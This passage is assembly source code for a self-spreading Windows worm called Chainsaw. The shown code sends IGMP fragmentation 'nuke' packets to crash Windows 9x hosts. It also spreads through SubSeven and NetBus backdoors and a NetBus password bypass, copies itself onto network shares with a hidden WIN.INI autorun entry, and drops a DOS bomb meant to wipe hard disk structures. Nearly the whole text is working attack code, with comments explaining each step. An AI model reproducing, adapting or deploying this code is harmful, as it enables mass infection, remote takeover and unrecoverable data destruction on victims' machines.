Rand_A_Class: MOV AL, 223 ; Random A/B/C class IP.
|
|||
|
CALL Random_AL
|
|||
|
|
|||
|
CMP AL, 10 ; Private network segment.
|
|||
|
JE Rand_A_Class
|
|||
|
|
|||
|
CMP AL, 127 ; Localhost network.
|
|||
|
JE Rand_A_Class
|
|||
|
|
|||
|
SHL EBX, 8
|
|||
|
MOV BL, AL
|
|||
|
|
|||
|
MOV Nuke_IP, EBX
|
|||
|
MOV Sub7_IP, EBX ; Store the random IP in our
|
|||
|
MOV NetBus_IP, EBX ; structures.
|
|||
|
MOV NetBus_IP_2, EBX
|
|||
|
MOV NetBios_IP, EBX
|
|||
|
|
|||
|
PUSH OFFSET System_Time ; Get system date.
|
|||
|
CALL GetSystemTime
|
|||
|
|
|||
|
CMP System_Time+(3*2), 31 ; Is today nuke day?
|
|||
|
JNE IP_To_ASCIIZ
|
|||
|
|
|||
|
PUSH IPPROTO_IGMP ; Create a raw IGMP socket.
|
|||
|
PUSH SOCK_RAW
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV IGMP_Socket, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Do_Random_IP
|
|||
|
|
|||
|
MOV EDI, 10 ; Send 10 nuke packets.
|
|||
|
|
|||
|
; Windows 95/98 has problems with handling fragmented IGMP
|
|||
|
; packets, when processing a whole bunch of these the system
|
|||
|
; will usually BSOD. Here we simply send a large packet (the
|
|||
|
; packet will arrive regardless of content it seems), which
|
|||
|
; will automatically be fragmented by the underlying TCP/IP
|
|||
|
; layers. Officially IGMP packets aren't supposed to leave
|
|||
|
; the current subnet, so if your ISP uses filtering (mainly
|
|||
|
; cable/ADSL connections), this nuke won't get through,
|
|||
|
; however SLIP/PPP connections (mainly dialups), seem to have
|
|||
|
; no problems delivering it.
|
|||
|
|
|||
|
Send_Nuke: PUSH 16 ; Send the nuke.
|
|||
|
PUSH OFFSET Nuke_Conn
|
|||
|
PUSH 0
|
|||
|
PUSH 15000
|
|||
|
PUSH OFFSET IGMP_Nuke
|
|||
|
PUSH IGMP_Socket
|
|||
|
CALL sendto
|
|||
|
|
|||
|
DEC EDI ; Send all 10 packets.
|
|||
|
JNZ Send_Nuke
|
|||
|
|
|||
|
Exit_Nuke: PUSH IGMP_Socket
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
JMP Do_Random_IP
|
|||
|
|
|||
|
IP_To_ASCIIZ: PUSH EBX ; Convert DWORD to ASCIIZ
|
|||
|
CALL inet_ntoa ; for the NetBios API's.
|
|||
|
|
|||
|
XCHG ESI, EAX
|
|||
|
MOV EDI, OFFSET NetBios_Remote+2
|
|||
|
|
|||
|
; Copy the ASCIIZ IP to our own buffer.
|
|||
|
|
|||
|
Copy_ASCIIZ_IP: LODSB
|
|||
|
STOSB
|
|||
|
|
|||
|
OR AL, AL ; Did entire ASCIIZ string?
|
|||
|
JNZ Copy_ASCIIZ_IP
|
|||
|
|
|||
|
PUSH 0 ; Create sockets.
|
|||
|
PUSH SOCK_STREAM
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV Sub7_Socket, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Chk_Inet_State
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH SOCK_STREAM
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV NetBus_Socket, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_Sub7
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH SOCK_STREAM
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV NetBios_Socket, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_NetBus
|
|||
|
|
|||
|
; The standard connect() timeout interval is like 100 seconds
|
|||
|
; or so, obviously this is way to long for portscanning, so we
|
|||
|
; need to set our own timeout interval. Unfortunately Winsock
|
|||
|
; does not have any API that can set a connect() timeout interval
|
|||
|
; (neither does BSD Sockets btw). Kind of stupid, but anyways,
|
|||
|
; here we realize our own timeout function by first switching
|
|||
|
; the connect() sockets to non-blocking mode, and then running
|
|||
|
; select() on em with a 1500ms timeout to see if they are connected.
|
|||
|
|
|||
|
PUSH OFFSET Boole_True ; Set socket to non-blocking
|
|||
|
PUSH FIONBIO ; mode.
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL ioctlsocket
|
|||
|
|
|||
|
PUSH OFFSET Boole_True
|
|||
|
PUSH FIONBIO
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL ioctlsocket
|
|||
|
|
|||
|
PUSH OFFSET Boole_True
|
|||
|
PUSH FIONBIO
|
|||
|
PUSH NetBios_Socket
|
|||
|
CALL ioctlsocket
|
|||
|
|
|||
|
PUSH 16 ; Connect SubSeven port.
|
|||
|
PUSH OFFSET Sub7_Conn
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL connect
|
|||
|
|
|||
|
PUSH 16 ; Connect NetBus port.
|
|||
|
PUSH OFFSET NetBus_Conn
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL connect
|
|||
|
|
|||
|
PUSH 16 ; Connect NetBios port.
|
|||
|
PUSH OFFSET NetBios_Conn ; (only to quickly probe the
|
|||
|
PUSH NetBios_Socket ; host for NetBios).
|
|||
|
CALL connect
|
|||
|
|
|||
|
MOV ESI, OFFSET Select_Struc
|
|||
|
MOV EDI, OFFSET Connect_Select
|
|||
|
|
|||
|
MOVSD
|
|||
|
MOVSD
|
|||
|
MOVSD
|
|||
|
MOVSD
|
|||
|
|
|||
|
PUSH OFFSET Time_Out ; Check if any sockets are
|
|||
|
PUSH 0 ; writeable (connected)
|
|||
|
PUSH OFFSET Connect_Select ; within 1500ms.
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
CALL select
|
|||
|
|
|||
|
INC EAX ; Error?
|
|||
|
JZ Close_NetBios
|
|||
|
|
|||
|
DEC EAX ; Zero sockets connected?
|
|||
|
JZ Close_NetBios
|
|||
|
|
|||
|
PUSH OFFSET Boole_False ; Switch sockets back to
|
|||
|
PUSH FIONBIO ; blocking mode.
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL ioctlsocket
|
|||
|
|
|||
|
PUSH OFFSET Boole_False
|
|||
|
PUSH FIONBIO
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL ioctlsocket
|
|||
|
|
|||
|
MOV EBX, Sub7_Socket ; Set send/recv timeout on
|
|||
|
CALL Set_Time_Outs ; sockets to prevent endless
|
|||
|
; blocking.
|
|||
|
MOV EBX, NetBus_Socket
|
|||
|
CALL Set_Time_Outs
|
|||
|
|
|||
|
MOV EDI, OFFSET Buffer ; recv-buffer.
|
|||
|
|
|||
|
Try_Sub7: PUSH 0 ; Attempt to get SubSeven
|
|||
|
PUSH 512 ; connection reply.
|
|||
|
PUSH EDI
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX ; Not connected?
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
; If it's a SubSeven server, and not password
|
|||
|
; protected, it should reply with 'connected',
|
|||
|
; and the time/date and version.
|
|||
|
|
|||
|
CMP [EDI], 'nnoc' ; If we can't access the Sub7
|
|||
|
JNE Try_NetBus ; server, move on to NetBus.
|
|||
|
|
|||
|
; First request a file upload by sending
|
|||
|
; 'RTF' with the upload path connected to
|
|||
|
; it: 'RTFChainsaw.exe'.
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_S7_Upload_Req-S7_Upload_Req)
|
|||
|
PUSH OFFSET S7_Upload_Req
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
PUSH 0 ; Fetch the reply, it should
|
|||
|
PUSH 512 ; be 'TID' if all is OK.
|
|||
|
PUSH EDI
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
CMP [EDI], 'nDIT' ; Check for 'TID' (plus last
|
|||
|
JNE Try_NetBus ; byte of previous recv).
|
|||
|
|
|||
|
; First let the server know the filesize of the
|
|||
|
; upload, this is done by sending a 'SFT' + the
|
|||
|
; length of the filesize (represented by two
|
|||
|
; numbers) + the actual filesize: 'SFT046144'.
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_S7_Upload_Size-S7_Upload_Size)
|
|||
|
PUSH OFFSET S7_Upload_Size
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
PUSH 0 ; Then send the actual file
|
|||
|
PUSH Worm_Size ; contents.
|
|||
|
PUSH OFFSET Worm_Code
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
; SubSeven works with a 1041-byte receive buffer, every
|
|||
|
; 1041 or less bytes received will be acknowledged with
|
|||
|
; a 'p:' + the total amount of bytes received + '.'.
|
|||
|
|
|||
|
Retrieve_Ack: PUSH 0 ; Receive a 7-byte 'p:xxxx.'
|
|||
|
PUSH 7 ; (don't read more than 7
|
|||
|
PUSH EDI ; bytes as often the data is
|
|||
|
PUSH Sub7_Socket ; overlapping).
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
CMP [EDI+2], '4416' ; Last acknowledgement?
|
|||
|
JNE Retrieve_Ack ; Otherwise just go on.
|
|||
|
|
|||
|
; Check upload reply, which should be 'file successfully uploaded.'
|
|||
|
; if all went fine, (however it seems to return this regardless of
|
|||
|
; success or failure..).
|
|||
|
|
|||
|
Check_UL_Reply: PUSH 0
|
|||
|
PUSH 512
|
|||
|
PUSH EDI
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
CMP [EDI+5], 'ccus' ; Check for 'success'.
|
|||
|
JNE Try_NetBus ; Bail on error.
|
|||
|
|
|||
|
; Now remotely execute the uploaded worm copy by sending a
|
|||
|
; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'.
|
|||
|
; SubSeven uses ShellExecuteA to run files, so it is capable
|
|||
|
; of opening any registered file extension such as .VBS etc.
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_S7_Exec_Req-S7_Exec_Req)
|
|||
|
PUSH OFFSET S7_Exec_Req
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBus
|
|||
|
|
|||
|
PUSH 0 ; Fetch the command reply,
|
|||
|
PUSH 512 ; which should be
|
|||
|
PUSH EDI ; 'file has been executed.'.
|
|||
|
PUSH Sub7_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
Try_NetBus: PUSH 0 ; Fetch connection reply.
|
|||
|
PUSH 512
|
|||
|
PUSH EDI
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
; NetBus servers respond with 'NetBus', and
|
|||
|
; the version, and if the server is password
|
|||
|
; protected also with an 'x'.
|
|||
|
|
|||
|
CMP [EDI], 'BteN' ; Is it an actual NetBus
|
|||
|
JNE Try_NetBios ; server?
|
|||
|
|
|||
|
; Server is password protected?
|
|||
|
|
|||
|
CMP BYTE PTR [EDI+EAX-3], 'x'
|
|||
|
JNE Upload_Worm
|
|||
|
|
|||
|
; Now try one password, 'netbus' (should be commonly used
|
|||
|
; I guess), together with a NetBus 1.60- backdoor function
|
|||
|
; that accepts any password.
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_NB_Password-NB_Password)
|
|||
|
PUSH OFFSET NB_Password
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
PUSH 0 ; Get password reply.
|
|||
|
PUSH 512
|
|||
|
PUSH EDI
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
; If the password got accepted then it
|
|||
|
; should return 'Access;1'.
|
|||
|
|
|||
|
CMP [EDI+4], '1;ss' ; 'Access;1' ?
|
|||
|
JNE Try_NetBios
|
|||
|
|
|||
|
; Request a file upload by sending 'UploadFile;'
|
|||
|
; + filename + ';' + filesize + ';' + upload path:
|
|||
|
; 'UploadFile;Chainsaw.exe;6144;\'.
|
|||
|
|
|||
|
Upload_Worm: PUSH 0
|
|||
|
PUSH (End_NB_Upload_Req-NB_Upload_Req)
|
|||
|
PUSH OFFSET NB_Upload_Req
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
PUSH 0 ; Fetch upload reply which
|
|||
|
PUSH 512 ; should be 'UploadReady'.
|
|||
|
PUSH EDI
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
CMP [EDI+4], 'eRda' ; 'UploadReady' ?
|
|||
|
JNE Try_NetBios
|
|||
|
|
|||
|
; Now connect to port number <NetBus_Port+1>,
|
|||
|
; which will handle the upload file content.
|
|||
|
|
|||
|
PUSH 0 ; Create a socket for the
|
|||
|
PUSH SOCK_STREAM ; upload connection.
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV NetBus_Socket_2, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Try_NetBios
|
|||
|
|
|||
|
MOV EBX, NetBus_Socket_2
|
|||
|
CALL Set_Time_Outs
|
|||
|
|
|||
|
PUSH 16 ; Connect the upload socket.
|
|||
|
PUSH OFFSET NetBus_Conn_2
|
|||
|
PUSH NetBus_Socket_2
|
|||
|
CALL connect
|
|||
|
|
|||
|
XCHG EBX, EAX
|
|||
|
|
|||
|
OR EBX, EBX
|
|||
|
JNZ Close_NetBus_2
|
|||
|
|
|||
|
PUSH 0 ; Send through the upload
|
|||
|
PUSH Worm_Size ; file contents.
|
|||
|
PUSH OFFSET Worm_Code
|
|||
|
PUSH NetBus_Socket_2
|
|||
|
CALL send
|
|||
|
|
|||
|
XCHG EBX, EAX
|
|||
|
|
|||
|
Close_NetBus_2: PUSH NetBus_Socket_2
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
INC EBX
|
|||
|
JZ Close_NetBios
|
|||
|
|
|||
|
; Now remotely execute the worm on the target's
|
|||
|
; system by sending 'StartApp;' + path to program:
|
|||
|
; 'StartApp;\Chainsaw.exe'.
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_NB_Exec_File-NB_Exec_File)
|
|||
|
PUSH OFFSET NB_Exec_File
|
|||
|
PUSH NetBus_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
Try_NetBios: MOV ESI, OFFSET Net_Resource_Struc
|
|||
|
MOV EDI, OFFSET Net_Resource
|
|||
|
|
|||
|
MOV ECX, 8
|
|||
|
REP MOVSD
|
|||
|
|
|||
|
CALL Locate_Shares ; Infect all shared drives.
|
|||
|
|
|||
|
Close_NetBios: PUSH NetBios_Socket
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
Close_NetBus: PUSH NetBus_Socket
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
Close_Sub7: PUSH Sub7_Socket
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
JMP Chk_Inet_State
|
|||
|
|
|||
|
|
|||
|
; Set the recv/send timeout to 5 seconds to prevent endless blocking.
|
|||
|
Set_Time_Outs:
|
|||
|
PUSH 4
|
|||
|
PUSH OFFSET IO_Time_Out
|
|||
|
PUSH SO_RCVTIMEO
|
|||
|
PUSH SOL_SOCKET
|
|||
|
PUSH EBX
|
|||
|
CALL setsockopt
|
|||
|
|
|||
|
PUSH 4
|
|||
|
PUSH OFFSET IO_Time_Out
|
|||
|
PUSH SO_SNDTIMEO
|
|||
|
PUSH SOL_SOCKET
|
|||
|
PUSH EBX
|
|||
|
CALL setsockopt
|
|||
|
|
|||
|
RETN
|
|||
|
|
|||
|
|
|||
|
Random_AL_254:
|
|||
|
MOV AL, 254
|
|||
|
|
|||
|
Random_AL: MOVZX EAX, AL
|
|||
|
|
|||
|
Random_EAX: PUSH EAX
|
|||
|
|
|||
|
CALL GetTickCount
|
|||
|
|
|||
|
ADD EAX, Random_Init
|
|||
|
JNP Xor_In_Init
|
|||
|
|
|||
|
RCL EAX, 2
|
|||
|
XCHG AL, AH
|
|||
|
ADD AL, 66h
|
|||
|
|
|||
|
Xor_In_Init: NOT EAX
|
|||
|
|
|||
|
PUSH 32
|
|||
|
POP ECX
|
|||
|
|
|||
|
CRC_Bit: SHR EAX, 1
|
|||
|
JNC Loop_CRC_Bit
|
|||
|
|
|||
|
XOR EAX, 0EDB88320h
|
|||
|
|
|||
|
Loop_CRC_Bit: LOOP CRC_Bit
|
|||
|
|
|||
|
POP ECX
|
|||
|
|
|||
|
XOR EDX, EDX
|
|||
|
DIV ECX
|
|||
|
|
|||
|
XCHG EDX, EAX
|
|||
|
INC EAX ; Can't be zero.
|
|||
|
|
|||
|
ROL Random_Init, 1 ; Adjust random seed.
|
|||
|
|
|||
|
RETN
|
|||
|
|
|||
|
|
|||
|
; And I thought NetBus was a lame buggy piece of shit, nothing beats
|
|||
|
; SubSeven, even though it's the one of the most advanched RAT's
|
|||
|
; available these days, it is programmed pretty badly, the author
|
|||
|
; clearly has no understanding of TCP/IP whatsoever, he doesn't
|
|||
|
; even terminate his TCP commands with a terminator for example,
|
|||
|
; which will lead to fragmented packets fucking up. Also, when you
|
|||
|
; supply wrong commands to the server, it will downright hang itself.
|
|||
|
; And as a bonus, SubSeven infected systems become slooow, not sure
|
|||
|
; exactly why.. I'd say, leave writing RAT's to people who know
|
|||
|
; their stuff, like the authors of Back Orifice 2000.
|
|||
|
|
|||
|
|
|||
|
; Recursively scans the host's resources for shared drives.
|
|||
|
Locate_Shares:
|
|||
|
PUSHAD
|
|||
|
|
|||
|
PUSH OFFSET Enum_Handle ; Start enumerating all
|
|||
|
PUSH OFFSET Net_Resource ; shared drives.
|
|||
|
PUSH 0
|
|||
|
PUSH RESOURCETYPE_DISK
|
|||
|
PUSH RESOURCE_GLOBALNET
|
|||
|
CALL WNetOpenEnumA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Exit_Loc_Share
|
|||
|
|
|||
|
MOV EBX, Enum_Handle
|
|||
|
|
|||
|
Enum_Resource: MOV Net_Struc_Count, 1
|
|||
|
|
|||
|
PUSH OFFSET Enum_Buf_Size ; Find shared drive.
|
|||
|
PUSH OFFSET Net_Resource
|
|||
|
PUSH OFFSET Net_Struc_Count
|
|||
|
PUSH EBX
|
|||
|
CALL WNetEnumResourceA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Close_Enum
|
|||
|
|
|||
|
CMP Net_Usage, RESOURCEUSAGE_CONTAINER
|
|||
|
JNE Infect_Share
|
|||
|
|
|||
|
CALL Locate_Shares
|
|||
|
|
|||
|
JMP Enum_Resource
|
|||
|
|
|||
|
Infect_Share: MOV Net_Local_Name, OFFSET Remote_Drive
|
|||
|
|
|||
|
PUSH 0 ; Map the shared drive to
|
|||
|
PUSH 0 ; 'T:'.
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET Net_Resource
|
|||
|
CALL WNetAddConnection2A
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Enum_Resource
|
|||
|
|
|||
|
PUSH 1 ; Copy Chainsaw.exe to the
|
|||
|
PUSH OFFSET Remote_Trojan ; root of this shared drive.
|
|||
|
PUSH OFFSET Own_Path
|
|||
|
CALL CopyFileA
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Un_Map_Share
|
|||
|
|
|||
|
PUSH OFFSET MsDos_Sys ; Attempt to get the Win9x
|
|||
|
PUSH 260 ; directory.
|
|||
|
PUSH OFFSET Win_Dir
|
|||
|
PUSH OFFSET Default_String
|
|||
|
PUSH OFFSET Win_Dir_Key
|
|||
|
PUSH OFFSET Paths_Section
|
|||
|
CALL GetPrivateProfileStringA
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Un_Map_Share
|
|||
|
|
|||
|
LEA EDI, [Win_Dir+ECX] ; Append '\WIN.INI' to it.
|
|||
|
MOV ESI, OFFSET Slash_Win_Ini
|
|||
|
MOV ECX, 9
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
PUSH OFFSET Win_Dir ; Add 'run=\Chainsaw.exe' to
|
|||
|
PUSH OFFSET Root_Dropper ; Win9x's WIN.INI.
|
|||
|
PUSH OFFSET Win_Ini_Run_Key
|
|||
|
PUSH OFFSET Windows_Section
|
|||
|
CALL WritePrivateProfileStringA
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Un_Map_Share
|
|||
|
|
|||
|
PUSH FILE_ATTRIBUTE_HIDDEN ; Hide the drop file.
|
|||
|
PUSH OFFSET Remote_Trojan
|
|||
|
CALL SetFileAttributesA
|
|||
|
|
|||
|
Un_Map_Share: PUSH 0 ; Unmap shared drive.
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET Remote_Drive
|
|||
|
CALL WNetCancelConnection2A
|
|||
|
|
|||
|
JMP Enum_Resource
|
|||
|
|
|||
|
Close_Enum: PUSH EBX
|
|||
|
CALL WNetCloseEnum
|
|||
|
|
|||
|
Exit_Loc_Share: POPAD
|
|||
|
|
|||
|
RETN
|
|||
|
|
|||
|
|
|||
|
; Ima go woop yo ass boy!
|
|||
|
Payload:
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
PUSH CREATE_ALWAYS
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
PUSH GENERIC_WRITE
|
|||
|
PUSH OFFSET Nuke_File
|
|||
|
CALL CreateFileA
|
|||
|
|
|||
|
XCHG EBX, EAX
|
|||
|
|
|||
|
PUSH 0 ; Write bomb.
|
|||
|
PUSH OFFSET Temp
|
|||
|
PUSH 666
|
|||
|
PUSH OFFSET DOS_Bomb
|
|||
|
PUSH EBX
|
|||
|
CALL WriteFile
|
|||
|
|
|||
|
PUSH EBX
|
|||
|
CALL CloseHandle
|
|||
|
|
|||
|
PUSH 0 ; Run the bomb (only WinExec
|
|||
|
PUSH OFFSET Nuke_File ; is capable of running DOS
|
|||
|
CALL WinExec ; files too).
|
|||
|
|
|||
|
JMP $ ; Heart stops..
|
|||
|
|
|||
|
|
|||
|
; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
|
|||
|
; Smashes disk structures of 1st 2 fixed disks, should be fast and
|
|||
|
; unrecoverable.
|
|||
|
|
|||
|
; .MODEL TINY
|
|||
|
; .CODE
|
|||
|
;
|
|||
|
; ORG 100h
|
|||
|
;START:
|
|||
|
; MOV AX, 3513h ; Grab INT 13h's address.
|
|||
|
; INT 21h
|
|||
|
;
|
|||
|
; MOV Int13h, BX ; Store it for later.
|
|||
|
; MOV Int13h+2, ES
|
|||
|
;
|
|||
|
; PUSH CS
|
|||
|
; POP ES
|
|||
|
;
|
|||
|
; XOR SI, SI
|
|||
|
;
|
|||
|
; MOV BX, OFFSET Trash_Text
|
|||
|
; MOV CX, (End_Trash_Text-Trash_Text)
|
|||
|
;
|
|||
|
; ; Decrypt trash text.
|
|||
|
;
|
|||
|
;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h
|
|||
|
;
|
|||
|
; INC SI
|
|||
|
;
|
|||
|
; LOOP Decrypt_Text
|
|||
|
;
|
|||
|
; INC CX ; CX = 0001h.
|
|||
|
;
|
|||
|
; MOV DX, 80h+1 ; Start trashing backwards
|
|||
|
; ; from 2nd HDD.
|
|||
|
;
|
|||
|
;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track
|
|||
|
; PUSHF ; 0 with our text.
|
|||
|
; DB 9Ah
|
|||
|
;Int13h DW 0, 0
|
|||
|
;
|
|||
|
; INC DH ; Smashed all heads?
|
|||
|
; JNZ Kill_Head
|
|||
|
;
|
|||
|
; DEC DL ; Smashed all HDD's ?
|
|||
|
; JS Kill_Head
|
|||
|
;
|
|||
|
;Exit: RETN ; Back to Windoze..
|
|||
|
;
|
|||
|
; DB 'T2' ; To pad this file to 666.
|
|||
|
;
|
|||
|
; ; XOR 66h encrypted:
|
|||
|
;
|
|||
|
; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
|
|||
|
; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
|
|||
|
; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
|
|||
|
; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
|
|||
|
; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
|
|||
|
; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
|
|||
|
; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
|
|||
|
; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
|
|||
|
; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
|
|||
|
; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
|
|||
|
; ; THE TEXAS CHAIN SAW MASSACRE..."
|
|||
|
;
|
|||
|
; ; (I adore this movie :)
|
|||
|
;
|
|||
|
;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h
|
|||
|
; DB 31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h
|
|||
|
; DB 27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h
|
|||
|
; DB 32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h
|
|||
|
; DB 27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h
|
|||
|
; DB 46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h
|
|||
|
; DB 34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh
|
|||
|
; DB 25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h
|
|||
|
; DB 27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h
|
|||
|
; DB 46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h
|
|||
|
; DB 2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h
|
|||
|
; DB 32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h
|
|||
|
; DB 27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h
|
|||
|
; DB 35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h
|
|||
|
; DB 34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h
|
|||
|
; DB 24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h
|
|||
|
; DB 27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h
|
|||
|
; DB 46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h
|
|||
|
; DB 2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h
|
|||
|
; DB 27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh
|
|||
|
; DB 27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
|
|||
|
; DB 34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h
|
|||
|
; DB 24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h
|
|||
|
; DB 2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h
|
|||
|
; DB 46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h
|
|||
|
; DB 3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h
|
|||
|
; DB 23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h
|
|||
|
; DB 29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh
|
|||
|
; DB 27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h
|
|||
|
; DB 23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h
|
|||
|
; DB 33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh
|
|||
|
; DB 27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h
|
|||
|
; DB 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h, 27h, 35h
|
|||
|
